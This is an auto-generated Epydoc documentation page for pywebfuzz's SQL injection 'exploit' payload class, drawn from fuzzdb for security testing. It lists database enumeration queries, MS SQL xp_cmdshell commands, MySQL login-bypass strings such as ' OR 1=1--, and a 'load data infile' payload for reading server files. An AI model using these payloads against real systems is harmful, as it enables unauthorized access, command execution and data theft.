<?xml version="1.0" encoding="ascii"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
          "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
  <title>pywebfuzz.fuzzdb.attack_payloads.sql_injection.exploit</title>
  <link rel="stylesheet" href="epydoc.css" type="text/css" />
  <script type="text/javascript" src="epydoc.js"></script>
</head>

<body bgcolor="white" text="black" link="blue" vlink="#204080"
      alink="#204080">
<!-- ==================== NAVIGATION BAR ==================== -->
<table class="navbar" border="0" width="100%" cellpadding="0"
       bgcolor="#a0c0ff" cellspacing="0">
  <tr valign="middle">
  <!-- Home link -->
      <th>&nbsp;&nbsp;&nbsp;<a
        href="pywebfuzz-module.html">Home</a>&nbsp;&nbsp;&nbsp;</th>

  <!-- Tree link -->
      <th>&nbsp;&nbsp;&nbsp;<a
        href="module-tree.html">Trees</a>&nbsp;&nbsp;&nbsp;</th>

  <!-- Index link -->
      <th>&nbsp;&nbsp;&nbsp;<a
        href="identifier-index.html">Indices</a>&nbsp;&nbsp;&nbsp;</th>

  <!-- Help link -->
      <th>&nbsp;&nbsp;&nbsp;<a
        href="help.html">Help</a>&nbsp;&nbsp;&nbsp;</th>

      <th class="navbar" width="100%"></th>
  </tr>
</table>
<table width="100%" cellpadding="0" cellspacing="0">
  <tr valign="top">
    <td width="100%">
      <span class="breadcrumbs">
        <a href="pywebfuzz-module.html">Package&nbsp;pywebfuzz</a> ::
        <a href="pywebfuzz.fuzzdb-module.html">Module&nbsp;fuzzdb</a> ::
        <a href="pywebfuzz.fuzzdb.attack_payloads-class.html">Class&nbsp;attack_payloads</a> ::
        <a href="pywebfuzz.fuzzdb.attack_payloads.sql_injection-class.html">Class&nbsp;sql_injection</a> ::
        Class&nbsp;exploit
      </span>
    </td>
    <td>
      <table cellpadding="0" cellspacing="0">
        <!-- hide/show private -->
        <tr><td align="right"><span class="options">[<a href="javascript:void(0);" class="privatelink"
    onclick="toggle_private();">hide&nbsp;private</a>]</span></td></tr>
        <tr><td align="right"><span class="options"
            >[<a href="frames.html" target="_top">frames</a
            >]&nbsp;|&nbsp;<a href="pywebfuzz.fuzzdb.attack_payloads.sql_injection.exploit-class.html"
            target="_top">no&nbsp;frames</a>]</span></td></tr>
      </table>
    </td>
  </tr>
</table>
<!-- ==================== CLASS DESCRIPTION ==================== -->
<h1 class="epydoc">Class exploit</h1><p class="nomargin-top"></p>
<p>This implements the exploit class of payloads from fuzzdb</p>

<!-- ==================== CLASS VARIABLES ==================== -->
<a name="section-ClassVariables"></a>
<table class="summary" border="1" cellpadding="3"
       cellspacing="0" width="100%" bgcolor="white">
<tr bgcolor="#70b0f0" class="table-header">
  <td colspan="2" class="table-header">
    <table border="0" cellpadding="0" cellspacing="0" width="100%">
      <tr valign="top">
        <td align="left"><span class="table-header">Class Variables</span></td>
        <td align="right" valign="top"
         ><span class="options">[<a href="#section-ClassVariables"
         class="privatelink" onclick="toggle_private();"
         >hide private</a>]</span></td>
      </tr>
    </table>
  </td>
</tr>
<tr>
    <td width="15%" align="right" valign="top" class="summary">
      <span class="summary-type">&nbsp;</span>
    </td><td class="summary">
        <a href="pywebfuzz.fuzzdb.attack_payloads.sql_injection.exploit-class.html#db2_enumeration" class="summary-name">db2_enumeration</a> = <code title="['select versionnumber, version_timestamp from sysibm.sysversions;',
 'select user from sysibm.sysdummy1;',
 'select session_user from sysibm.sysdummy1;',
 'select system_user from sysibm.sysdummy1;',
 'select current server from sysibm.sysdummy1;',
 'select name from sysibm.systables;',
 'select grantee from syscat.dbauth;',
 'select * from syscat.tabauth;',
..."><code class="variable-group">[</code><code class="variable-quote">'</code><code class="variable-string">select versionnumber, version_timestamp fr</code><code class="variable-ellipsis">...</code></code>
    </td>
  </tr>
<tr>
    <td width="15%" align="right" valign="top" class="summary">
      <span class="summary-type">&nbsp;</span>
    </td><td class="summary">
        <a href="pywebfuzz.fuzzdb.attack_payloads.sql_injection.exploit-class.html#ms_sql_enumeration" class="summary-name">ms_sql_enumeration</a> = <code title="['select @@version',
 'select @@servernamee',
 'select @@microsoftversione',
 'select * from master..sysserverse',
 'select * from sysusers',
 'exec master..xp_cmdshell \'ipconfig+/all\'',
 'exec master..xp_cmdshell \'net+view\'',
 'exec master..xp_cmdshell \'net+users\'',
..."><code class="variable-group">[</code><code class="variable-quote">'</code><code class="variable-string">select @@version</code><code class="variable-quote">'</code><code class="variable-op">, </code><code class="variable-quote">'</code><code class="variable-string">select @@servername</code><code class="variable-ellipsis">...</code></code>
    </td>
  </tr>
<tr>
    <td width="15%" align="right" valign="top" class="summary">
      <span class="summary-type">&nbsp;</span>
    </td><td class="summary">
        <a href="pywebfuzz.fuzzdb.attack_payloads.sql_injection.exploit-class.html#mysql_injection_login_bypass" class="summary-name">mysql_injection_login_bypass</a> = <code title="['&lt;username&gt;\' OR 1=1--',
 '\'OR \'\' = \'\tAllows authentication without a valid username.',
 '&lt;username&gt;\'--',
 '\' union select 1, \'&lt;user-fieldname&gt;\', \'&lt;pass-fieldname&gt;\' 1--',
 '\'OR 1=1--']"><code class="variable-group">[</code><code class="variable-quote">'</code><code class="variable-string">&lt;username&gt;\' OR 1=1--</code><code class="variable-quote">'</code><code class="variable-op">, </code><code class="variable-quote">'</code><code class="variable-string">\'OR</code><code class="variable-ellipsis">...</code></code>
    </td>
  </tr>
<tr>
    <td width="15%" align="right" valign="top" class="summary">
      <span class="summary-type">&nbsp;</span>
    </td><td class="summary">
        <a href="pywebfuzz.fuzzdb.attack_payloads.sql_injection.exploit-class.html#mysql_read_local_files" class="summary-name">mysql_read_local_files</a> = <code title="['create table myfile (input TEXT); load data infile \'&lt;filepath&gt;\' in\
to table myfile; select * from myfile;']"><code class="variable-group">[</code><code class="variable-quote">'</code><code class="variable-string">create table myfile (input TEXT); l</code><code class="variable-ellipsis">...</code></code>
    </td>
  </tr>
<tr>
    <td width="15%" align="right" valign="top" class="summary">
      <span class="summary-type">&nbsp;</span>
    </td><td class="summary">
        <a href="pywebfuzz.fuzzdb.attack_payloads.sql_injection.exploit-class.html#location" class="summary-name">location</a> = <code title="'/data/attack-payloads/sql-injection/exploit/postgres-enumeration.txt'"><code class="variable-quote">'</code><code class="variable-string">/data/attack-payloads/sql-injection/exploit/postgr</code><code class="variable-ellipsis">...</code></code>
    </td>
  </tr>
<tr>
    <td width="15%" align="right" valign="top" class="summary">
      <span class="summary-type">&nbsp;</span>
    </td><td class="summary">
        <a href="pywebfuzz.fuzzdb.attack_payloads.sql_injection.exploit-class.html#postgres_enumeration" class="summary-name">postgres_enumeration</a> = <code title="['select version();',
 'select current_database();',
 'select current_user;',
 'select session_user;',
 'select current_setting(\'log_connections\');',
 'select current_setting(\'log_statement\');',
 'select current_setting(\'port\');',
 'select current_setting(\'password_encryption\');',
..."><code class="variable-group">[</code><code class="variable-quote">'</code><code class="variable-string">select version();</code><code class="variable-quote">'</code><code class="variable-op">, </code><code class="variable-quote">'</code><code class="variable-string">select current_d</code><code class="variable-ellipsis">...</code></code>
    </td>
  </tr>
</table>
<!-- ==================== CLASS VARIABLE DETAILS ==================== -->
<a name="section-ClassVariableDetails"></a>
<table class="details" border="1" cellpadding="3"
       cellspacing="0" width="100%" bgcolor="white">
<tr bgcolor="#70b0f0" class="table-header">
  <td colspan="2" class="table-header">
    <table border="0" cellpadding="0" cellspacing="0" width="100%">
      <tr valign="top">
        <td align="left"><span class="table-header">Class Variable Details</span></td>
        <td align="right" valign="top"
         ><span class="options">[<a href="#section-ClassVariableDetails"
         class="privatelink" onclick="toggle_private();"
         >hide private</a>]</span></td>
      </tr>
    </table>
  </td>
</tr>
</table>
<a name="db2_enumeration"></a>
<div>
<table class="details" border="1" cellpadding="3"
       cellspacing="0" width="100%" bgcolor="white">
<tr><td>
  <h3 class="epydoc">db2_enumeration</h3>
  
  <dl class="fields">
  </dl>
  <dl class="fields">
    <dt>Value:</dt>
      <dd><table><tr><td><pre class="variable">
<code class="variable-group">[</code><code class="variable-quote">'</code><code class="variable-string">select versionnumber, version_timestamp from sysibm.sysversions;</code><code class="variable-quote">'</code><code class="variable-op">,</code>
 <code class="variable-quote">'</code><code class="variable-string">select user from sysibm.sysdummy1;</code><code class="variable-quote">'</code><code class="variable-op">,</code>
 <code class="variable-quote">'</code><code class="variable-string">select session_user from sysibm.sysdummy1;</code><code class="variable-quote">'</code><code class="variable-op">,</code>
 <code class="variable-quote">'</code><code class="variable-string">select system_user from sysibm.sysdummy1;</code><code class="variable-quote">'</code><code class="variable-op">,</code>
 <code class="variable-quote">'</code><code class="variable-string">select current server from sysibm.sysdummy1;</code><code class="variable-quote">'</code><code class="variable-op">,</code>
 <code class="variable-quote">'</code><code class="variable-string">select name from sysibm.systables;</code><code class="variable-quote">'</code><code class="variable-op">,</code>
 <code class="variable-quote">'</code><code class="variable-string">select grantee from syscat.dbauth;</code><code class="variable-quote">'</code><code class="variable-op">,</code>
 <code class="variable-quote">'</code><code class="variable-string">select * from syscat.tabauth;</code><code class="variable-quote">'</code><code class="variable-op">,</code>
<code class="variable-ellipsis">...</code>
</pre></td></tr></table>
</dd>
  </dl>
</td></tr></table>
</div>
<a name="ms_sql_enumeration"></a>
<div>
<table class="details" border="1" cellpadding="3"
       cellspacing="0" width="100%" bgcolor="white">
<tr><td>
  <h3 class="epydoc">ms_sql_enumeration</h3>
  
  <dl class="fields">
  </dl>
  <dl class="fields">
    <dt>Value:</dt>
      <dd><table><tr><td><pre class="variable">
<code class="variable-group">[</code><code class="variable-quote">'</code><code class="variable-string">select @@version</code><code class="variable-quote">'</code><code class="variable-op">,</code>
 <code class="variable-quote">'</code><code class="variable-string">select @@servernamee</code><code class="variable-quote">'</code><code class="variable-op">,</code>
 <code class="variable-quote">'</code><code class="variable-string">select @@microsoftversione</code><code class="variable-quote">'</code><code class="variable-op">,</code>
 <code class="variable-quote">'</code><code class="variable-string">select * from master..sysserverse</code><code class="variable-quote">'</code><code class="variable-op">,</code>
 <code class="variable-quote">'</code><code class="variable-string">select * from sysusers</code><code class="variable-quote">'</code><code class="variable-op">,</code>
 <code class="variable-quote">'</code><code class="variable-string">exec master..xp_cmdshell \'ipconfig+/all\'</code><code class="variable-quote">'</code><code class="variable-op">,</code>
 <code class="variable-quote">'</code><code class="variable-string">exec master..xp_cmdshell \'net+view\'</code><code class="variable-quote">'</code><code class="variable-op">,</code>
 <code class="variable-quote">'</code><code class="variable-string">exec master..xp_cmdshell \'net+users\'</code><code class="variable-quote">'</code><code class="variable-op">,</code>
<code class="variable-ellipsis">...</code>
</pre></td></tr></table>
</dd>
  </dl>
</td></tr></table>
</div>
<a name="mysql_injection_login_bypass"></a>
<div>
<table class="details" border="1" cellpadding="3"
       cellspacing="0" width="100%" bgcolor="white">
<tr><td>
  <h3 class="epydoc">mysql_injection_login_bypass</h3>
  
  <dl class="fields">
  </dl>
  <dl class="fields">
    <dt>Value:</dt>
      <dd><table><tr><td><pre class="variable">
<code class="variable-group">[</code><code class="variable-quote">'</code><code class="variable-string">&lt;username&gt;\' OR 1=1--</code><code class="variable-quote">'</code><code class="variable-op">,</code>
 <code class="variable-quote">'</code><code class="variable-string">\'OR \'\' = \'\tAllows authentication without a valid username.</code><code class="variable-quote">'</code><code class="variable-op">,</code>
 <code class="variable-quote">'</code><code class="variable-string">&lt;username&gt;\'--</code><code class="variable-quote">'</code><code class="variable-op">,</code>
 <code class="variable-quote">'</code><code class="variable-string">\' union select 1, \'&lt;user-fieldname&gt;\', \'&lt;pass-fieldname&gt;\' 1--</code><code class="variable-quote">'</code><code class="variable-op">,</code>
 <code class="variable-quote">'</code><code class="variable-string">\'OR 1=1--</code><code class="variable-quote">'</code><code class="variable-group">]</code>
</pre></td></tr></table>
</dd>
  </dl>
</td></tr></table>
</div>
<a name="mysql_read_local_files"></a>
<div>
<table class="details" border="1" cellpadding="3"
       cellspacing="0" width="100%" bgcolor="white">
<tr><td>
  <h3 class="epydoc">mysql_read_local_files</h3>
  
  <dl class="fields">
  </dl>
  <dl class="fields">
    <dt>Value:</dt>
      <dd><table><tr><td><pre class="variable">
<code class="variable-group">[</code><code class="variable-quote">'</code><code class="variable-string">create table myfile (input TEXT); load data infile \'&lt;filepath&gt;\' in</code><span class="variable-linewrap"><img src="crarr.png" alt="\" /></span>
<code class="variable-string">to table myfile; select * from myfile;</code><code class="variable-quote">'</code><code class="variable-group">]</code>
</pre></td></tr></table>
</dd>
  </dl>
</td></tr></table>
</div>
<a name="location"></a>
<div>
<table class="details" border="1" cellpadding="3"
       cellspacing="0" width="100%" bgcolor="white">
<tr><td>
  <h3 class="epydoc">location</h3>
  
  <dl class="fields">
  </dl>
  <dl class="fields">
    <dt>Value:</dt>
      <dd><table><tr><td><pre class="variable">
<code class="variable-quote">'</code><code class="variable-string">/data/attack-payloads/sql-injection/exploit/postgres-enumeration.txt</code><code class="variable-quote">'</code>
</pre></td></tr></table>
</dd>
  </dl>
</td></tr></table>
</div>
<a name="postgres_enumeration"></a>
<div>
<table class="details" border="1" cellpadding="3"
       cellspacing="0" width="100%" bgcolor="white">
<tr><td>
  <h3 class="epydoc">postgres_enumeration</h3>
  
  <dl class="fields">
  </dl>
  <dl class="fields">
    <dt>Value:</dt>
      <dd><table><tr><td><pre class="variable">
<code class="variable-group">[</code><code class="variable-quote">'</code><code class="variable-string">select version();</code><code class="variable-quote">'</code><code class="variable-op">,</code>
 <code class="variable-quote">'</code><code class="variable-string">select current_database();</code><code class="variable-quote">'</code><code class="variable-op">,</code>
 <code class="variable-quote">'</code><code class="variable-string">select current_user;</code><code class="variable-quote">'</code><code class="variable-op">,</code>
 <code class="variable-quote">'</code><code class="variable-string">select session_user;</code><code class="variable-quote">'</code><code class="variable-op">,</code>
 <code class="variable-quote">'</code><code class="variable-string">select current_setting(\'log_connections\');</code><code class="variable-quote">'</code><code class="variable-op">,</code>
 <code class="variable-quote">'</code><code class="variable-string">select current_setting(\'log_statement\');</code><code class="variable-quote">'</code><code class="variable-op">,</code>
 <code class="variable-quote">'</code><code class="variable-string">select current_setting(\'port\');</code><code class="variable-quote">'</code><code class="variable-op">,</code>
 <code class="variable-quote">'</code><code class="variable-string">select current_setting(\'password_encryption\');</code><code class="variable-quote">'</code><code class="variable-op">,</code>
<code class="variable-ellipsis">...</code>
</pre></td></tr></table>
</dd>
  </dl>
</td></tr></table>
</div>
<br />
<!-- ==================== NAVIGATION BAR ==================== -->
<table class="navbar" border="0" width="100%" cellpadding="0"
       bgcolor="#a0c0ff" cellspacing="0">
  <tr valign="middle">
  <!-- Home link -->
      <th>&nbsp;&nbsp;&nbsp;<a
        href="pywebfuzz-module.html">Home</a>&nbsp;&nbsp;&nbsp;</th>

  <!-- Tree link -->
      <th>&nbsp;&nbsp;&nbsp;<a
        href="module-tree.html">Trees</a>&nbsp;&nbsp;&nbsp;</th>

  <!-- Index link -->
      <th>&nbsp;&nbsp;&nbsp;<a
        href="identifier-index.html">Indices</a>&nbsp;&nbsp;&nbsp;</th>

  <!-- Help link -->
      <th>&nbsp;&nbsp;&nbsp;<a
        href="help.html">Help</a>&nbsp;&nbsp;&nbsp;</th>

      <th class="navbar" width="100%"></th>
  </tr>
</table>
<table border="0" cellpadding="0" cellspacing="0" width="100%%">
  <tr>
    <td align="left" class="footer">
    Generated by Epydoc 3.0.1 on Wed Oct 20 23:04:09 2010
    </td>
    <td align="right" class="footer">
      <a target="mainFrame" href="http://epydoc.sourceforge.net"
        >http://epydoc.sourceforge.net</a>
    </td>
  </tr>
</table>

<script type="text/javascript">
  <!--
  // Private objects are initially displayed (because if
  // javascript is turned off then we want them to be
  // visible); but by default, we want to hide them.  So hide
  // them unless we have a cookie that says to show them.
  checkCookie();
  // -->
</script>
</body>
</html>
